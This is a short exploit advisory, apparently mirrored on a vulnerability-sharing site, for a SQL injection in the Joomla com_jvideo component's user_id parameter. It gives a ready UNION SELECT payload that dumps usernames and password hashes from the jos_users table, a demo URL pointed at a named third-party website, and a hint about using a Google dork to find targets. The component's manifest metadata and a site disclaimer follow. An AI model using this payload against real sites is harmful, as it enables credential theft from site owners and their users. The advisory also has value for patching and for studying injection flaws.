++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Joomla Component com_jvideo (user_id) SQL-injection Vulnerability ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ################################################### [+] Author : Chip D3 Bi0s [+] Greetz : d4n!ux + x_jeshua + eCORE + Painboy + rayok3nt + 3l3cTron1k_0 [+] Vulnerability : SQL injection [+] Google Dork : imagine ;) -------------------------------------------------- author : Russell... author Email : chipdebios[alt+64]gmail.com ################################################### Example: http://localHost/path/index.php?option=com_jvideo&view=user&user_id=62[SQL code] SQL code: +and+1=2+union+select+concat(username,0x3a,password)+from+jos_users DEMO: http://www.mosessite.com/index.php?option=com_jvideo&view=user&user_id=62+and%201=2+union+select+concat(username,0x3a,password)+from+jos_users etc, etc.... +++++++++++++++++++++++++++++++++++++++ #[!] Produced in South America +++++++++++++++++++++++++++++++++++++++ <name>JVideo!</name> <creationDate>September 2008</creationDate> <author>Infinovision.com</author> <authorEmail>team@infinovision.com</authorEmail> <authorUrl>http://www.infinovision.com</authorUrl> <copyright>Copyright 2008 Infinovision.com</copyright> <license>http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL</license> <version>0.3.11c Beta</version> <description>JVideo! Component</description>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论